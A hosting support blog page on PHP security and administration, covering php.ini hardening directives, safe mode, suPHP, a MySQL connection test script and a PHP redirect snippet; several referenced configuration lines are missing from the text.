ServerBuddies Support Blog

PHP Security

PHP as a module or as a CGI

Using PHP as a module is suitable for systems that are dedicated to a single purpose or for sites run by trusted groups of administrators and developers. Using PHP as a CGI (possibly with an execution wrapper) is a better option when users cannot be fully trusted.

When PHP is installed as a module, it becomes a part of Apache and performs all operations as the Apache user (usually httpd).

Using PHP as a CGI

Compiling PHP as a CGI is similar to compiling it for the situation where you are going to use it as a module. This mode of operation is the default for PHP, so there is no need to specify an option on the configure line.

Migrating from a module to CGI operation, therefore, requires modifying every script.

register_globals and allow_url_fopen

register_globals. This option is off by default as of PHP 4.2.0

allow_url_fopen, allows programmers to treat URLs as files.

Because of security reasons, we turn off these options in the php.ini file:

PHP uses modules to extend its functionality dynamically. Unlike Apache, PHP can load modules programmatically using the dl( ) function from a script. When a dynamic module is loaded, it integrates into PHP and runs with its full permissions.

Use the expose_php configuration directive to tell PHP to keep quiet.

Setting this directive to Off will prevent the version number from reaching the Server response header and special URLs from being processed:

The PHP configuration directives disable_functions and disable_classes allow arbitrary functions and classes to be disabled.

The most useful security-related PHP directive is open_basedir. It tells PHP which files it can access.

Given that web server root, here is how open_basedir should be set:

When PHP is compiled with a –enable-memory-limit, it becomes possible to put a limit on the amount of memory a script consumes. Consider using this option to prevent badly written scripts from using too much memory. The limit is set via the memory_limit option in the configuration file:

You can limit the size of each POST request. Other request methods can have a body, and this option applies to all of them. You will need to increase this value from the default value specified below if you plan to allow large file uploads:

The max_input_time option limits the time a PHP script can spend processing input.

The max_execution_time option limits the time a PHP script spends running.

File uploads can be turned on and off using the file_uploads directive.

Safe mode (http://www.php.net/manual/en/features.safe-mode.php) is an attempt of\PHP developers to enhance security of PHP deployments. Once this mode is enabled, the PHP engine imposes a series of restrictions, making script execution more secure.

PHP safe mode is a useful tool. We start by turning on the safe mode:

Safe mode puts restrictions on external process execution. Only binaries in the safe directory can be executed from PHP scripts:

The following functions are affected:

• exec( )
• system( )
• passthru( )
• popen( )

Some methods of program execution do not work in safe mode:

shell_exec( ) Disabled in safe mode.
backtick operator Disabled in safe mode.
dl( ) Disabled in safe mode.

Hardened-PHP (http://www.hardened-php.net) is a project that has a goal of remedying some of the shortcomings present in the mainstream PHP distribution.

Reference - http://www.php.net

Testing PHP-MySQL connection

dbHost = IP address of the remote database server.
dbname= give the database name
dbuser= database user
dbPass= the password of the user.

Add this script to your public_html (ie: name it dbtest.php) for your site and access it via browser and check whether the user is able to connect.

<?php
$dbHost = ” “;
$dbName = ” “;
$dbUser = ” “;
$dbPass =
$dbType = “mysql”;
mysql_connect($dbHost, $dbUser, $dbPass) or die(”could not connect “.mysql_error());
mysql_select_db($dbName) or die(”could not select db “.mysql_error());
echo “db selected”;
?>

How to Add Custom Modules to php in DirectAdmin

If you want to add any extra modules to php, they’ll most likely need to be compiled in. Any module that needs to be compiled in will have a –with-module type flag which will need to be used. To add this flag, run the following:

If you’re using custombuild instead of customapache, use the following configure file(s) then repeat the above steps, but use ‘custombuild’ instead of ‘customapache’ in the path:

Then restart apache

How to forward a website to another url using PHP

To do this, you need to create the page that will do the forwarding. This can be any page, as long as it ends in “.php”. If you are trying to redirect a domain, you’d create “index.php” inside the public_html directory.

<?php
header(”Location: http://blog.serverbuddies.com”);
?>

Where http://blog.serverbuddies.com is the location that you want the page to forward to.

Hardening PHP
Run As The User Instead of “nobody” . You can run PHP as the user (like CGI scripts do with Apache’s suexec)

Enable suPHP

PHP scripts are executed by the user who owns the VirtualHost serving the request.

Use Hardening Tools Like phpsuhosin

Remove Insecure Scripts

Apache directives like php_value are not valid for mod_suphp. It is possible to place a php.ini file in the directory containing the PHP script and specify these types of values in it.

For PHP scripts to execute, permissions of 0400 are sufficient. Scripts are run as the user who owns the VirtualHost, and as long as this user has permissions sufficient to write to a file/directory, PHP scripts will also have the ability to do so. Mod_SuPHP performs various security checks before executing PHP scripts. Most can be disabled in Mod_SuPHP configuration file located at /opt/suphp/etc/suphp.conf